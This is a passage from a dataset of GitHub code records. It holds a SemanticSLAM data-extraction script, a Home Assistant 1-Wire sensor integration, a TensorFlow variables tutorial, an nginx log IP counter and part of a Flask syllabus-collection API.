eval(input(\"Enter the ending point M:\\n\"))\n palinprimes=palinprime(N, M)\n pplist = palinprimes.split(' ') # turns string into a list that can be printed\n print(\"The palindromic primes are:\")\n printpp(pplist)\n \n\nif __name__ ==\"__main__\":\n main()\n \n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/wlkcla004/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23928406432","text":"import os,json,torch\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nimport numpy as np\n# import shutil\n\nfrom observation_system import Observation_System\nfrom parameters import Parameters\nfrom segment_anything import SamPredictor, SamAutomaticMaskGenerator, sam_model_registry\nimport cv2\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom resnet import FeatureExtractor\nfrom einops import rearrange\nimport torchvision.transforms as transforms\nfrom model_utils import project_to_ground_plane, compute_spatial_locs\n\nnp.set_printoptions(precision=2,linewidth=40000,threshold=1000000)\ntorch.set_printoptions(precision=2,edgeitems=1000,linewidth=40000,threshold=1000000)\n\ndef create_folder(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\ndef main():\n new_directory = \"/home/mli170/SLAM_PROJECT/SemanticSLAM_data/2023_Apr29th_segment_process\" # Replace this with the desired directory path\n os.chdir(new_directory)\n\n print('''2023 Aug20th dataset\n version details: The ground layers are 1 in semantc and -1 in abstract, and invisible are all 0\n However, the pointcloud just points to farset points. So we use ceiling to indicate visible ground area.\n\n 2.recommand set noise threshold to 0.02 when scale=3, \n which means any cell contains 2% total pixel are considered as noise\n\n 3.resnet extract low-level feautre of the images, then project to the ground by pointcloud with 64 channel\n\n 4.The numpy file is a array of length L, with each [position, obervation_wochannel, observation_semantic, observation_shallow_feature]\n\n ''')\n \n\n length = 80\n device = 'cuda:0'\n # output_path = 'data_1_seg'\n output_path = 'data_3_seg_resnet'\n print('intput_folder:','2023_Jun19th_dataset_w_rgbd_raw_scale3_40objects')\n print('output_folder:',output_path) \n\n # =============Load Resnet Model and Segment Anything Model================\n featureExtr = FeatureExtractor().to(device=device)\n # sam = sam_model_registry[\"vit_b\"](checkpoint=\"../segment_anything/sam_vit_b_01ec64.pth\")\n sam = sam_model_registry[\"vit_h\"](checkpoint=\"./segment_anything/sam_vit_h_4b8939.pth\")\n sam.to(device=device)\n predictor = SamPredictor(sam)\n \n preprocess = transforms.Compose([\n # transforms.ToPILImage(),\n transforms.ToTensor(), # This step normalizes the values\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n # =============Load Semantic Model================\n P = Parameters()\n obs_system = Observation_System(P, predictor, device)\n \n \n for id in tqdm(range(1,31,1)):\n print('\\nEnv id: slam_'+str(id))\n base_path='../data_raw/2023_Jun19th_dataset_w_rgbd_raw_scale3_40objects/slam_%d/'%id\n create_folder(base_path+'/raw')\n #for i in range(3):\n # shutil.move(base_path+\"%d.npy\"%(i+1), base_path+\"/raw/%d.npy\"%(i+1))\n\n files=os.listdir(base_path+'raw/')\n create_folder(base_path+'/image')\n #create_folder(base_path+'/data')\n #create_folder(base_path+'/data_2')\n create_folder(base_path+'/'+output_path)\n #create_folder(base_path+'/data_test')\n create_folder(base_path+'/camera')\n \n npy_files=[]\n for i in files:\n if i.find('.npy')>=0:\n npy_files.append(i)\n npy_files.sort()\n\n for i in npy_files:\n check=0\n name = i.split('.')[0]\n data = np.load(base_path+'raw/'+i,allow_pickle=True,encoding='bytes')\n\n # env = np.load(base_path+'label.npy',allow_pickle=True,encoding='bytes')\n # print(f'Env:\\n{env}')\n n = 1\n tmp = []\n camera = []\n print(f'total data number:{len(data)}')\n for j in data:\n \n check+=1\n position = j[0]\n image = j[1].astype(np.int32)\n image = cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_BGR2RGB)\n \n # print(image.shape)\n # plt.imsave(f'{check}.png',j[1])\n\n pointcloud = j[2].astype(np.float64)\n pointcloud = pointcloud.reshape(image.shape) #h, w, 3\n\n # ---------Call function to generate YoloV3+Segmentation observations---------------\n valid,observation,observation_s = obs_system.yolo_generate(image,pointcloud,np.array(position))\n if not valid: \n print('Invalid ID: ',check-1)\n continue\n \n # -------Get low level feature from the image and depth---------\n \n image = preprocess(image)[None,].to(device) # (bs, f, H/K, W/K)\n pointcloud = rearrange(torch.tensor(pointcloud)[None,].to(device), 'b h w c -> b c h w') # (bs, 3, H, W)\n img_feature = featureExtr(image)\n # print(f\"image:{img_feature.shape}\\n{img_feature}\") \n # print(f\"pointcloud:{pointcloud.shape}\\n{pointcloud}\")\n # project to ground\n spatial_locs, valid_inputs = compute_spatial_locs(pointcloud, P.local_map_shape[1:], P.grid_unit)\n ground_feature = project_to_ground_plane(img_feature, spatial_locs, valid_inputs, P.local_map_shape[1:], 4).detach().cpu().numpy() # (1, F, s, s)\n rotated_gp_feature = obs_system.rotate_3D(ground_feature.copy(),180,False)\n # print(f\"ground_feature:{ground_feature.shape}\\n{ground_feature}\")\n # for i in range(64):\n # print(f\"channel:{i}\")\n # for j in range(33):\n # print(ground_feature[0,i,j])\n # print(\"rotate\")\n # for j in range(33):\n # print(rotated_gp_feature[0,i,j])\n # return\n '''add ground layer to observations'''\n # ones = torch.ones((1,1,*observation_s.shape))\n # sum = torch.sum(observation_s,axis=1)\n # sum = ones - sum\n # sum = sum[0]\n # observation_s = observation_s[0]\n # observation_s = torch.vstack((sum,observation_s))\n # observation_s = observation_s[None,:]\n\n # print(f'observation_After:{observation.shape}\\n{observation}')\n # print(f'obserobservation_semantic_scorevation_After:{observation_s.shape}\\n{observation_s}')\n tmp.append(np.array([np.array(position),np.array(observation),np.array(observation_s),rotated_gp_feature],dtype=object))\n #camera.append(np.array([np.array(position),np.array(image),np.array(pointcloud)],dtype=object))\n #image = cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_BGR2RGB)\n #cv2.imwrite(base_path+'/image/%s/%d.png'%(name,n),image)\n n+=1\n\n if n==length+1:\n break\n\n \n if len(tmp) != length:\n print('Error length',f'{length} step needed but got {len(tmp)}')\n return\n num = length -len(tmp)\n for j in range(num):\n tmp = np.vstack((tmp,tmp[-1]))\n\n # for j in range(length):\n # tmp[j][2] = np.where(tmp[j][2]>0,tmp[j][2],0)\n # tmp[j][2] = np.where(tmp[j][2]<1,tmp[j][2],1)\n print(f'position:{np.array(position).shape}\\nobservation:{np.array(observation).shape}\\nobservation_s:{np.array(observation_s).shape}ground_feature:{ground_feature.shape}')\n \n np.save(base_path+f'{output_path}/{name}.npy',np.array(tmp,dtype=object))\n #np.save(base_path+'camera/%s.npy'%(name),np.array(camera,dtype=object))\n #break\n\nif __name__ == '__main__':\n main()\n","repo_name":"Leomingyangli/SemanticSLAM_data","sub_path":"2023_Apr29th_segment_process/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27152648347","text":"\"\"\"Support for 1-Wire environment sensors.\"\"\"\nfrom __future__ import annotations\n\nimport asyncio\nfrom collections.abc import Callable, Mapping\nimport copy\nfrom dataclasses import dataclass\nimport logging\nimport os\nfrom types import MappingProxyType\nfrom typing import TYPE_CHECKING, Any\n\nfrom pi1wire import InvalidCRCException, OneWireInterface, UnsupportResponseException\n\nfrom homeassistant.components.sensor import (\n SensorDeviceClass,\n SensorEntity,\n SensorEntityDescription,\n SensorStateClass,\n)\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import (\n CONF_TYPE,\n ELECTRIC_POTENTIAL_VOLT,\n LIGHT_LUX,\n PERCENTAGE,\n PRESSURE_CBAR,\n PRESSURE_MBAR,\n TEMP_CELSIUS,\n)\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity import DeviceInfo\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import StateType\n\nfrom .const import (\n CONF_TYPE_OWSERVER,\n CONF_TYPE_SYSBUS,\n DEVICE_KEYS_0_3,\n DEVICE_KEYS_A_B,\n DOMAIN,\n OPTION_ENTRY_DEVICE_OPTIONS,\n OPTION_ENTRY_SENSOR_PRECISION,\n PRECISION_MAPPING_FAMILY_28,\n READ_MODE_FLOAT,\n READ_MODE_INT,\n)\nfrom .model import OWDirectDeviceDescription, OWServerDeviceDescription\nfrom .onewire_entities import (\n OneWireBaseEntity,\n OneWireEntityDescription,\n OneWireProxyEntity,\n)\nfrom .onewirehub import OneWireHub\n\n\n@dataclass\nclass OneWireSensorEntityDescription(OneWireEntityDescription, SensorEntityDescription):\n \"\"\"Class describing OneWire sensor entities.\"\"\"\n\n override_key: Callable[[str, Mapping[str, Any]], str] | None = None\n\n\ndef _get_sensor_precision_family_28(device_id: str, options: Mapping[str, Any]) -> str:\n \"\"\"Get precision form config flow options.\"\"\"\n precision: str = (\n options.get(OPTION_ENTRY_DEVICE_OPTIONS, {})\n .get(device_id, {})\n .get(OPTION_ENTRY_SENSOR_PRECISION, \"temperature\")\n )\n if precision in PRECISION_MAPPING_FAMILY_28:\n return precision\n _LOGGER.warning(\n \"Invalid sensor precision `%s` for device `%s`: reverting to default\",\n precision,\n device_id,\n )\n return \"temperature\"\n\n\nSIMPLE_TEMPERATURE_SENSOR_DESCRIPTION = OneWireSensorEntityDescription(\n key=\"temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nDEVICE_SENSORS: dict[str, tuple[OneWireSensorEntityDescription, ...]] = {\n \"10\": (SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,),\n \"12\": (\n OneWireSensorEntityDescription(\n key=\"TAI8570/temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n entity_registry_enabled_default=False,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"TAI8570/pressure\",\n device_class=SensorDeviceClass.PRESSURE,\n entity_registry_enabled_default=False,\n name=\"Pressure\",\n native_unit_of_measurement=PRESSURE_MBAR,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"22\": (SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,),\n \"26\": (\n SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,\n OneWireSensorEntityDescription(\n key=\"humidity\",\n device_class=SensorDeviceClass.HUMIDITY,\n entity_registry_enabled_default=False,\n name=\"Humidity\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"HIH3600/humidity\",\n device_class=SensorDeviceClass.HUMIDITY,\n entity_registry_enabled_default=False,\n name=\"Humidity HIH3600\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"HIH4000/humidity\",\n device_class=SensorDeviceClass.HUMIDITY,\n entity_registry_enabled_default=False,\n name=\"Humidity HIH4000\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"HIH5030/humidity\",\n device_class=SensorDeviceClass.HUMIDITY,\n entity_registry_enabled_default=False,\n name=\"Humidity HIH5030\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"HTM1735/humidity\",\n device_class=SensorDeviceClass.HUMIDITY,\n entity_registry_enabled_default=False,\n name=\"Humidity HTM1735\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"B1-R1-A/pressure\",\n device_class=SensorDeviceClass.PRESSURE,\n entity_registry_enabled_default=False,\n name=\"Pressure\",\n native_unit_of_measurement=PRESSURE_MBAR,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"S3-R1-A/illuminance\",\n device_class=SensorDeviceClass.ILLUMINANCE,\n entity_registry_enabled_default=False,\n name=\"Illuminance\",\n native_unit_of_measurement=LIGHT_LUX,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"VAD\",\n device_class=SensorDeviceClass.VOLTAGE,\n entity_registry_enabled_default=False,\n name=\"Voltage VAD\",\n native_unit_of_measurement=ELECTRIC_POTENTIAL_VOLT,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"VDD\",\n device_class=SensorDeviceClass.VOLTAGE,\n entity_registry_enabled_default=False,\n name=\"Voltage VDD\",\n native_unit_of_measurement=ELECTRIC_POTENTIAL_VOLT,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"vis\",\n device_class=SensorDeviceClass.VOLTAGE,\n entity_registry_enabled_default=False,\n name=\"vis\",\n native_unit_of_measurement=ELECTRIC_POTENTIAL_VOLT,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"28\": (\n OneWireSensorEntityDescription(\n key=\"temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n override_key=_get_sensor_precision_family_28,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"30\": (\n SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,\n OneWireSensorEntityDescription(\n key=\"typeX/temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n entity_registry_enabled_default=False,\n name=\"Thermocouple temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n override_key=lambda d, o: \"typeK/temperature\",\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"volt\",\n device_class=SensorDeviceClass.VOLTAGE,\n entity_registry_enabled_default=False,\n name=\"Voltage\",\n native_unit_of_measurement=ELECTRIC_POTENTIAL_VOLT,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"vis\",\n device_class=SensorDeviceClass.VOLTAGE,\n entity_registry_enabled_default=False,\n name=\"vis\",\n native_unit_of_measurement=ELECTRIC_POTENTIAL_VOLT,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"3B\": (SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,),\n \"42\": (SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,),\n \"1D\": tuple(\n OneWireSensorEntityDescription(\n key=f\"counter.{id}\",\n name=f\"Counter {id}\",\n native_unit_of_measurement=\"count\",\n read_mode=READ_MODE_INT,\n state_class=SensorStateClass.TOTAL_INCREASING,\n )\n for id in DEVICE_KEYS_A_B\n ),\n}\n\n# EF sensors are usually hobbyboards specialized sensors.\n# These can only be read by OWFS. Currently this driver only supports them\n# via owserver (network protocol)\n\nHOBBYBOARD_EF: dict[str, tuple[OneWireSensorEntityDescription, ...]] = {\n \"HobbyBoards_EF\": (\n OneWireSensorEntityDescription(\n key=\"humidity/humidity_corrected\",\n device_class=SensorDeviceClass.HUMIDITY,\n name=\"Humidity\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"humidity/humidity_raw\",\n device_class=SensorDeviceClass.HUMIDITY,\n name=\"Humidity Raw\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"humidity/temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"HB_MOISTURE_METER\": tuple(\n OneWireSensorEntityDescription(\n key=f\"moisture/sensor.{id}\",\n device_class=SensorDeviceClass.PRESSURE,\n name=f\"Moisture {id}\",\n native_unit_of_measurement=PRESSURE_CBAR,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n )\n for id in DEVICE_KEYS_0_3\n ),\n}\n\n# 7E sensors are special sensors by Embedded Data Systems\n\nEDS_SENSORS: dict[str, tuple[OneWireSensorEntityDescription, ...]] = {\n \"EDS0066\": (\n OneWireSensorEntityDescription(\n key=\"EDS0066/temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"EDS0066/pressure\",\n device_class=SensorDeviceClass.PRESSURE,\n name=\"Pressure\",\n native_unit_of_measurement=PRESSURE_MBAR,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"EDS0068\": (\n OneWireSensorEntityDescription(\n key=\"EDS0068/temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"EDS0068/pressure\",\n device_class=SensorDeviceClass.PRESSURE,\n name=\"Pressure\",\n native_unit_of_measurement=PRESSURE_MBAR,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"EDS0068/light\",\n device_class=SensorDeviceClass.ILLUMINANCE,\n name=\"Illuminance\",\n native_unit_of_measurement=LIGHT_LUX,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"EDS0068/humidity\",\n device_class=SensorDeviceClass.HUMIDITY,\n name=\"Humidity\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n}\n\n\ndef get_sensor_types(\n device_sub_type: str,\n) -> dict[str, tuple[OneWireSensorEntityDescription, ...]]:\n \"\"\"Return the proper info array for the device type.\"\"\"\n if \"HobbyBoard\" in device_sub_type:\n return HOBBYBOARD_EF\n if \"EDS\" in device_sub_type:\n return EDS_SENSORS\n return DEVICE_SENSORS\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Set up 1-Wire platform.\"\"\"\n onewirehub = hass.data[DOMAIN][config_entry.entry_id]\n entities = await hass.async_add_executor_job(\n get_entities, onewirehub, config_entry.data, config_entry.options\n )\n async_add_entities(entities, True)\n\n\ndef get_entities(\n onewirehub: OneWireHub,\n config: MappingProxyType[str, Any],\n options: MappingProxyType[str, Any],\n) -> list[SensorEntity]:\n \"\"\"Get a list of entities.\"\"\"\n if not onewirehub.devices:\n return []\n\n entities: list[SensorEntity] = []\n conf_type = config[CONF_TYPE]\n # We have an owserver on a remote(or local) host/port\n if conf_type == CONF_TYPE_OWSERVER:\n assert onewirehub.owproxy\n for device in onewirehub.devices:\n if TYPE_CHECKING:\n assert isinstance(device, OWServerDeviceDescription)\n family = device.family\n device_type = device.type\n device_id = device.id\n device_info = device.device_info\n device_sub_type = \"std\"\n device_path = device.path\n if \"EF\" in family:\n device_sub_type = \"HobbyBoard\"\n family = device_type\n elif \"7E\" in family:\n device_sub_type = \"EDS\"\n family = device_type\n\n if family not in get_sensor_types(device_sub_type):\n continue\n for description in get_sensor_types(device_sub_type)[family]:\n if description.key.startswith(\"moisture/\"):\n s_id = description.key.split(\".\")[1]\n is_leaf = int(\n onewirehub.owproxy.read(\n f\"{device_path}moisture/is_leaf.{s_id}\"\n ).decode()\n )\n if is_leaf:\n description = copy.deepcopy(description)\n description.device_class = SensorDeviceClass.HUMIDITY\n description.native_unit_of_measurement = PERCENTAGE\n description.name = f\"Wetness {s_id}\"\n override_key = None\n if description.override_key:\n override_key = description.override_key(device_id, options)\n device_file = os.path.join(\n os.path.split(device.path)[0],\n override_key or description.key,\n )\n name = f\"{device_id} {description.name}\"\n entities.append(\n OneWireProxySensor(\n description=description,\n device_id=device_id,\n device_file=device_file,\n device_info=device_info,\n name=name,\n owproxy=onewirehub.owproxy,\n )\n )\n\n # We have a raw GPIO ow sensor on a Pi\n elif conf_type == CONF_TYPE_SYSBUS:\n for device in onewirehub.devices:\n if TYPE_CHECKING:\n assert isinstance(device, OWDirectDeviceDescription)\n p1sensor: OneWireInterface = device.interface\n family = p1sensor.mac_address[:2]\n device_id = f\"{family}-{p1sensor.mac_address[2:]}\"\n device_info = device.device_info\n description = SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION\n device_file = f\"/sys/bus/w1/devices/{device_id}/w1_slave\"\n name = f\"{device_id} {description.name}\"\n entities.append(\n OneWireDirectSensor(\n description=description,\n device_id=device_id,\n device_file=device_file,\n device_info=device_info,\n name=name,\n owsensor=p1sensor,\n )\n )\n\n return entities\n\n\nclass OneWireSensor(OneWireBaseEntity, SensorEntity):\n \"\"\"Mixin for sensor specific attributes.\"\"\"\n\n entity_description: OneWireSensorEntityDescription\n\n\nclass OneWireProxySensor(OneWireProxyEntity, OneWireSensor):\n \"\"\"Implementation of a 1-Wire sensor connected through owserver.\"\"\"\n\n entity_description: OneWireSensorEntityDescription\n\n @property\n def native_value(self) -> StateType:\n \"\"\"Return the state of the entity.\"\"\"\n return self._state\n\n\nclass OneWireDirectSensor(OneWireSensor):\n \"\"\"Implementation of a 1-Wire sensor directly connected to RPI GPIO.\"\"\"\n\n def __init__(\n self,\n description: OneWireSensorEntityDescription,\n device_id: str,\n device_info: DeviceInfo,\n device_file: str,\n name: str,\n owsensor: OneWireInterface,\n ) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n super().__init__(\n description=description,\n device_id=device_id,\n device_info=device_info,\n device_file=device_file,\n name=name,\n )\n self._attr_unique_id = device_file\n self._owsensor = owsensor\n\n @property\n def native_value(self) -> StateType:\n \"\"\"Return the state of the entity.\"\"\"\n return self._state\n\n async def get_temperature(self) -> float:\n \"\"\"Get the latest data from the device.\"\"\"\n attempts = 1\n while True:\n try:\n return await self.hass.async_add_executor_job(\n self._owsensor.get_temperature\n )\n except UnsupportResponseException as ex:\n _LOGGER.debug(\n \"Cannot read from sensor %s (retry attempt %s): %s\",\n self._device_file,\n attempts,\n ex,\n )\n await asyncio.sleep(0.2)\n attempts += 1\n if attempts > 10:\n raise\n\n async def async_update(self) -> None:\n \"\"\"Get the latest data from the device.\"\"\"\n try:\n self._value_raw = await self.get_temperature()\n self._state = round(self._value_raw, 1)\n except (\n FileNotFoundError,\n InvalidCRCException,\n UnsupportResponseException,\n ) as ex:\n _LOGGER.warning(\n \"Cannot read from sensor %s: %s\",\n self._device_file,\n ex,\n )\n self._state = None\n","repo_name":"turbokongen/onewire-sysbus","sub_path":"custom_components/onewire-sysbus/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":19849,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"44674275540","text":"''' Create variables, which is mutable tensor values\nVariables handle by session, so we must init them inside a Session\n'''\n\nimport tensorflow as tf\nimport numpy as np\n\nmy_var = tf.Variable(1, name=\"my_variable\")\n\nadd = tf.add(5, my_var)\nmul = tf.multiply(3, my_var)\n\n# we can use helper ops to create common tensor type\n# 2x2 matrix of zeros\nzeros = tf.zeros([2, 2])\n\n# vector with length = 6 of ones\nones = tf.ones([6])\n\n# 3x3x3 Tensor of random uniform values between 0 to 10\nuniform = tf.random_uniform([3,3,3], minval=0, maxval=10)\n\n# 3x3x3 Tensor of normal distribution values, mean = 0, standard deviation = 2\nnormal = tf.random_normal([3,3,3], mean=0.0, stddev=2.0)\n\n# 2x2 Tensor of distribution without values <3 and >7\ntrunc = tf.truncated_normal([2,2], mean=5.0, stdded=1.0)\n\n# Fast declaration\nrandom_var = tf.Variable(tf.truncated_normal([2,2]))\n\n# Initialize all the variables\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n# Initialize a subset of variables\nvar1 = tf.Variable(0, name=\"initizlize_this\")\nvar2 = tf.Variable(1, name=\"leave_this_alone\")\ninit1 = tf.initialize_variables([var1], name=\"init_var1\")\nsess.run(init1)\n","repo_name":"HuynhLam/tf","sub_path":"sam/create_variables.py","file_name":"create_variables.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36391130697","text":"from collections import Counter\n\naccess_ip = []\nwith open(\"/var/log/nginx/access.log\") as file:\n data_access = [line.strip().split(' ') for line in file]\n for data in data_access:\n access_ip.append(data[0])\n\ndata_ip = Counter(access_ip).most_common()\n\nwith open('/opt/report.txt', 'w') as file:\n for ip in data_ip:\n file.write(str(ip).strip('()').replace(\",\", \" \")+'\\n')\n","repo_name":"Bgmraul/admin","sub_path":"nginx-metrics-reporter.py","file_name":"nginx-metrics-reporter.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71673125559","text":"# coding=utf-8\n__author__ = 'smallfly'\n\nfrom flask_restful import Resource\nfrom flask_restful.reqparse import RequestParser\nfrom app.mod_interaction.database_operations import common\nfrom app.mod_interaction import models\nfrom app import db\n\ndef delete_record(db, record):\n try:\n # 删除数据\n db.session.delete(record)\n db.session.commit()\n return True\n except Exception as e:\n db.session.rollback()\n return False, e\n\ndef check_token(user, token):\n token_check = {\n \"uid\": user.id,\n \"token\": token\n }\n return common.check_token(token_check)\n\n\nclass SyllabusCollectionResource(Resource):\n \"\"\"\n 用于记录课表\n \"\"\"\n\n POST_PARSER = RequestParser(trim=True)\n GET_PARSER = RequestParser(trim=True)\n DELETE_PARSER = RequestParser(trim=True)\n\n def get(self):\n \"\"\"\n 申请人获取用户已经上传的课表数据\n 地址: /interaction/api/v2/syllabus_collection\n 方法: GET\n 参数:\n 位置: headers\n 必须参数:\n username 用户账号\n token 验证令牌\n collectionID 之前申请到的获取id\n :return:\n \"\"\"\n self.GET_PARSER.add_argument(\"username\", required=True, location=\"headers\")\n self.GET_PARSER.add_argument(\"token\", required=True, location=\"headers\")\n # header里面的键名不能有下划线\n self.GET_PARSER.add_argument(\"collectionID\", required=True, location=\"headers\")\n\n args = self.GET_PARSER.parse_args()\n user = common.query_single_by_filed(models.User, \"account\", args[\"username\"])\n if user is None:\n return {\"error\": \"user doesn't exist\"}, 404\n\n if not check_token(user, args[\"token\"]):\n return {\"error\": \"token is wrong\"}, 401\n\n collector = common.query_single_by_filed(models.Collector, \"collection_id\", args[\"collectionID\"])\n if collector is None:\n # 表明用户输入了错误的collection_id\n return {\"error\": \"wrong collection_id\"}, 404\n\n # 检查权限\n if collector.uid != user.id:\n return {\"error\": \"have not the permission\"}, 403\n\n collections = models.SyllabusCollection.query.filter_by(collection_id=args[\"collectionID\"]).all()\n collections = [ dict(id=x.id, account=x.account, syllabus=x.syllabus) for x in collections ]\n return {\"collections\": collections}\n\n\n def post(self):\n \"\"\"\n 发送课表数据到服务器\n 地址: /interaction/api/v2/syllabus_collection\n 方法: POST\n 参数:\n 位置: form\n 必选参数:\n username 用户账号\n token 验证令牌\n start_year 学年的开始年份\n season 某个学期, 和学分制对应\n syllabus 课表的JSON数据\n :return:\n \"\"\"\n self.POST_PARSER.add_argument(\"username\", required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"token\", required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"start_year\", type=int, required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"season\", type=int, required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"collection_id\", required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"syllabus\", required=True, location=\"form\")\n\n args = self.POST_PARSER.parse_args()\n user = common.query_single_by_filed(models.User, \"account\", args[\"username\"])\n if user is None:\n return {\"error\": \"user doesn't exist\"}, 404\n\n if not check_token(user, args[\"token\"]):\n return {\"error\": \"token is wrong\"}, 401\n\n collector = common.query_single_by_filed(models.Collector, \"collection_id\", args[\"collection_id\"])\n if collector is None:\n # 表明用户输入了错误的collection_id\n return {\"error\": \"wrong collection_id\"}, 404\n\n # 检查学期是否正确\n if collector.start_year != args[\"start_year\"] or collector.season != args[\"season\"]:\n return {\"error\": \"semester doesn't match\"}, 400\n\n collection = models.SyllabusCollection.query.filter_by(account=user.account).filter_by(collection_id=args[\"collection_id\"]).first()\n\n if collection is not None:\n # 